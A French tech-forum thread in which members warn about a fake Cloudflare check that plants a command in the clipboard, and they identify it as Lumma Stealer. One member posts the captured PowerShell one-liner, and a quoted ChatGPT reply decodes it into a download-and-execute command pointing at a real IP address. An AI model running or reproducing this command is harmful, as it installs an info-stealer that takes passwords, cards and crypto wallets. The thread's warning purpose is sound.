Une nouvelle saloperie ?

Discussions sur la sécurisation des protocoles, les authentifications, les CVE, les failles de sécu, le chiffrement,...
Avatar du membre
brunob
Membre
Membre
Messages : 896
Enregistré le : 21 sept. 2022, 18:32
Score de réactions : 128
Dernière activité : Aujourd’hui, 17:14
Âge : 65

Une nouvelle saloperie ?

Message par brunob »

Saluttatous.

En surfant "honnêtement" sur le web, je suis tombé sur une belle m... qui a dû en piéger un paquet à ce que je peux lire sur reddit notamment.

Une page se faisant passer pour cloudflare injecte dans le presse papiers un code malicieux "pour vérifier" te demande de faire win+R puis ctrl+V puis enter.

Si t'as le malheur de suivre les instructions tu lances une saloperie susceptible de voler tes identifiants (notamment les jetons qui remplacent les mots de passe) et de foutre le boxon dans tes comptes.

J'avais jamais entendu parler de cette vérole, heureusement que ces manip "bizarres" m'ont mis la puce à l'oreille on est tellement habitués à ces "cloudflares" surtout quand on est sous VPN qu'on se ferait facilement avoir.
Avatar du membre
kiki37
Expérimenté ⭐⭐⭐
Expérimenté ⭐⭐⭐
Messages : 692
Enregistré le : 02 févr. 2024, 00:07
Score de réactions : 39
Dernière activité : En ligne actuellement

Re: Une nouvelle saloperie ?

Message par kiki37 »

Salut
Tiens, à propos de VPN : celui là n'est pas mal ! :mrgreen:
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html
"Qui dira toute la malice dont les choses sont capables lorsqu'elles cherchent à vous embêter ?"...E.Aisberg (son C.V.)
Avatar du membre
solar10
Modérateur en chef
Modérateur en chef
Messages : 20568
Enregistré le : 01 nov. 2017, 12:15
Score de réactions : 596
Dernière activité : En ligne actuellement
Localisation : https://www.liege.be/fr/evenements/agenda
Âge : 62

Re: Une nouvelle saloperie ?

Message par solar10 »

Image
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
Avatar du membre
Unix-Linux
Membre
Membre
Messages : 11737
Enregistré le : 10 nov. 2017, 21:50
Score de réactions : 132
Dernière activité : il y a 2 minutes

Re: Une nouvelle saloperie ?

Message par Unix-Linux »

Non, ce n'est pas nouveau, ça circule via les forums clandestins depuis 2022

C'est un malware : Lumma Stealer
From to May 2025, Microsoft identified 394,000 computers that were infected with Lumma

Démantèlement de Lumma Stealer : Microsoft conduit une action mondiale contre un outil prisé du cybercrime

Image

Ajouté après : 12 minutes 53 secondes:
kiki37 a écrit : 29 août 2025, 14:57 Salut
Tiens, à propos de VPN : celui là n'est pas mal ! :mrgreen:
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html
You get what you pay for :mrgreen:
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Avatar du membre
brunob
Membre
Membre
Messages : 896
Enregistré le : 21 sept. 2022, 18:32
Score de réactions : 128
Dernière activité : Aujourd’hui, 17:14
Âge : 65

Re: Une nouvelle saloperie ?

Message par brunob »

Mmmhh connaissais pas mais c'est vicieux surtout l'association avec cloudfire.

Pour le VPN j'ai NordVPN ça marche pas mal surtout ici pour les TV limitées géographiquement.
Faut juste les niquer en désactivant le renouvellement et reprendre un nouvel abo sinon le prix double !
Avatar du membre
Unix-Linux
Membre
Membre
Messages : 11737
Enregistré le : 10 nov. 2017, 21:50
Score de réactions : 132
Dernière activité : il y a 2 minutes

Re: Une nouvelle saloperie ?

Message par Unix-Linux »

Pas compliqué, si le catchpa est véritablement provenant de cloudflare, c'est marqué dessus :wink:

Cloudfire ? Connais pas.

Image
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Avatar du membre
solar10
Modérateur en chef
Modérateur en chef
Messages : 20568
Enregistré le : 01 nov. 2017, 12:15
Score de réactions : 596
Dernière activité : En ligne actuellement
Localisation : https://www.liege.be/fr/evenements/agenda
Âge : 62

Re: Une nouvelle saloperie ?

Message par solar10 »

Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
Avatar du membre
Unix-Linux
Membre
Membre
Messages : 11737
Enregistré le : 10 nov. 2017, 21:50
Score de réactions : 132
Dernière activité : il y a 2 minutes

Re: Une nouvelle saloperie ?

Message par Unix-Linux »

solar10 a écrit : 29 août 2025, 16:58 Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.
:oui: :bravo:
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Avatar du membre
brunob
Membre
Membre
Messages : 896
Enregistré le : 21 sept. 2022, 18:32
Score de réactions : 128
Dernière activité : Aujourd’hui, 17:14
Âge : 65

Re: Une nouvelle saloperie ?

Message par brunob »

Unix-Linux a écrit : 29 août 2025, 16:55 Pas compliqué, si le catchpa est véritablement provenant de cloudflare, c'est marqué dessus :wink:

Cloudfire ? Connais pas.

Image
J'ai glissé chef ! :ok:

Ajouté après : 4 minutes 39 secondes:
solar10 a écrit : 29 août 2025, 16:58 Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.
Le raccourci clavier m'a justement fait vachement tiquer, je les connais et je ne voyais pas pourquoi il aurait fallu lancer un truc :rouge:

Mais je n'avais jamais entendu que sans intervention un site puisse glisser un truc dans le presse papier !

On en apprend tous les jour malgré des années d'expérience !
Avatar du membre
stéphane
Légendaire ⭐⭐⭐⭐⭐
Légendaire ⭐⭐⭐⭐⭐
Messages : 4519
Enregistré le : 30 nov. 2017, 21:27
Score de réactions : 47
Dernière activité : Aujourd’hui, 18:57

Re: Une nouvelle saloperie ?

Message par stéphane »

CTRL v c'est un fameux Red flag quand-même
Avatar du membre
solitaire
Expérimenté ⭐⭐⭐
Expérimenté ⭐⭐⭐
Messages : 657
Enregistré le : 13 août 2022, 10:56
Score de réactions : 28
Dernière activité : Aujourd’hui, 17:51
Âge : 69

Re: Une nouvelle saloperie ?

Message par solitaire »

Capturé à l'instant..... (= ce qu'il y a dans 'un' Ctrl V)
!!! NE PAS EXECUTER !!!
powershell -window min [Text.Encoding]::UTF8.GetString([System.Runtime.Remoting.Metadata.W3cXsd2001.SoapHexBinary]::Parse('262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578').Value)|powershell

si un pro peut nous dire où ça mène...!
Avatar du membre
solar10
Modérateur en chef
Modérateur en chef
Messages : 20568
Enregistré le : 01 nov. 2017, 12:15
Score de réactions : 596
Dernière activité : En ligne actuellement
Localisation : https://www.liege.be/fr/evenements/agenda
Âge : 62

Re: Une nouvelle saloperie ?

Message par solar10 »

Le matou GPT dit:
Cette ligne fait en fait trois choses :

1. Elle décode la chaîne hexadécimale
« 262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578 »
en UTF-8 pour obtenir le texte suivant :
& (gal cu*) -useb http://104.164.55.7/099/moro4.q | iex

2. Elle pipe ce texte vers un nouvel appel PowerShell

3. Et ce texte, une fois exécuté, fait :
• `(gal cu*)` est équivalent à `Get-Alias cu*`, qui renvoie l’alias `curl` (alias de Invoke-WebRequest)
• `& ( … ) -UseBasicParsing http://…/moro4.q` lance donc `Invoke-WebRequest -UseBasicParsing` pour télécharger le fichier `moro4.q` depuis 104.164.55.7
• le résultat est ensuite piping dans `iex` (Invoke-Expression), c’est-à-dire exécuté comme du code PowerShell

En résumé, c’est un one-liner visant à récupérer à distance un script hébergé sur 104.164.55.7 et à l’exécuter immédiatement sur la machine.
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
Avatar du membre
solitaire
Expérimenté ⭐⭐⭐
Expérimenté ⭐⭐⭐
Messages : 657
Enregistré le : 13 août 2022, 10:56
Score de réactions : 28
Dernière activité : Aujourd’hui, 17:51
Âge : 69

Re: Une nouvelle saloperie ?

Message par solitaire »

et le script dont question, il fait +- quoi?!
Avatar du membre
Unix-Linux
Membre
Membre
Messages : 11737
Enregistré le : 10 nov. 2017, 21:50
Score de réactions : 132
Dernière activité : il y a 2 minutes

Re: Une nouvelle saloperie ?

Message par Unix-Linux »

solitaire a écrit : 29 août 2025, 20:03 et le script dont question, il fait +- quoi?!
A récupérer des mots de passe, des cartes de crédit, des comptes bancaires et des portefeuilles de cryptomonnaies.
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS
Avatar du membre
solitaire
Expérimenté ⭐⭐⭐
Expérimenté ⭐⭐⭐
Messages : 657
Enregistré le : 13 août 2022, 10:56
Score de réactions : 28
Dernière activité : Aujourd’hui, 17:51
Âge : 69

Re: Une nouvelle saloperie ?

Message par solitaire »

et bien, ça c'est pas sympa !!
Avatar du membre
solar10
Modérateur en chef
Modérateur en chef
Messages : 20568
Enregistré le : 01 nov. 2017, 12:15
Score de réactions : 596
Dernière activité : En ligne actuellement
Localisation : https://www.liege.be/fr/evenements/agenda
Âge : 62

Re: Une nouvelle saloperie ?

Message par solar10 »

solitaire a écrit : 29 août 2025, 20:03 et le script dont question, il fait +- quoi?!
J'ai pas de machine Windows sous la main. Le matou GPT donne ces instructions pour le télécharger en sécurité :

Je ne peux pas télécharger directement ce script depuis l’extérieur (je n’ai pas d’accès réseau), mais je peux t’aider à l’analyser si tu me fournis son contenu.
Voici comment faire de ton côté, en PowerShell, en toute sécurité :

1. Ouvre une console PowerShell avec les droits appropriés (idéalement dans une machine virtuelle ou sandbox).
2. Télécharge le fichier sans l’exécuter :
Invoke-WebRequest -Uri "http://104.164.55.7/099/moro4.q" -UseBasicParsing -OutFile .\moro4.q

3. Ouvre ensuite le fichier avec un éditeur de texte ou affiche-le dans la console :
Get-Content .\moro4.q

4. Copie-colle-moi le contenu ici, et je te ferai une analyse détaillée (structures, appels externes, fonctions, éventuels comportements malveillants).

Si tu ne disposes pas d’un environnement isolé, ne l’exécute surtout pas avant d’avoir vérifié ce qu’il contient. Une fois le texte sous les yeux, je pourrai décrire chaque portion de code, expliquer les techniques utilisées et évaluer la dangerosité.


Donc, s'il ne fait pas des km, quelqu'un peu le coller ici ou l'envoyer via mp?

Added after 1 hour 38 minutes 47 seconds:
J'ai pu récupérer le fichier moro4.q mais je vois pas ce que ça fait.
Ah, j'ai dû contourner mes protections piHole pour y arriver. L'IP est apparemment connue comme nocive.
Internet: Edpnet VDSL XL [passé: _ - EDPNet - Scarlet - dxADSL - Scarlet One (NL) - Cybernet - Compuserve] + Fritz!Box 7530AX+4040
TV: TCL 50P616 UHD/HDR Android TV + Fransat CAM+Carte + TNT belge + Parabole multi-LNB (5°W + 13°E +19.2E + 28.2°E)
Tel Fixe: VOIP OVH (abonnement découverte) + 4x Fritz!Fon C5 + Clone Betamax
Tel Mobile: abo Base15 (eSIM) - Google Pixel 7a
NAS: Orange Pi 3 LTS avec boitier Fantec 4 baies, 26TB
Antipub: Pi Zero with DietPi + PiHole + Unbound
Avatar du membre
Darksky
Membre
Membre
Messages : 472
Enregistré le : 04 sept. 2020, 10:47
Score de réactions : 37
Dernière activité : En ligne actuellement
Localisation : Région Mons
Âge : 41

Re: Une nouvelle saloperie ?

Message par Darksky »

solar10 a écrit : 29 août 2025, 22:10 L'IP est apparemment connue comme nocive.
Elle l'est, mais ne semble pas encore détectée par beaucoup d'AV actuellement.
Analyse VirusTotal
Après peut-être qu'à l'exécution, les autres AV chopent le truc.
PC principal:Ryzen 7 9800X3D/TUF Gaming RX 7800 XT/32Go/SSD Mint 22/ Win11 Portable: Lenovo IdeaPad Slim 5
Smartphone: OnePlus 12
Mobile: Hey! Mobile L
Internet: Hey!
Avatar du membre
Unix-Linux
Membre
Membre
Messages : 11737
Enregistré le : 10 nov. 2017, 21:50
Score de réactions : 132
Dernière activité : il y a 2 minutes

Re: Une nouvelle saloperie ?

Message par Unix-Linux »

Faudrait peut-être tout de même planquer cette adresse IP avant que le personnel de gestion informatique du spw walbonie ne clique dessus, pensant que c'est un download pour un antivirus gratuit contre la cyberttaque :pensif:
Parabole Triax Multifeed 4 LNB + DAB+ RTL2832U R820T2 + CI Module
Base (Voo HFC - EDPnet VDSL XL - Brutele - RealRoot - Tvcablenet)
Raspberry Pi 4 : FreeBSD-arm64-aarch64
Raspberry Pi 4 : Gentoo arm64
Orange Pi 5 Ultra : DietPi + NAS
Server : Ubuntu LTS

Retourner vers « Sécurité »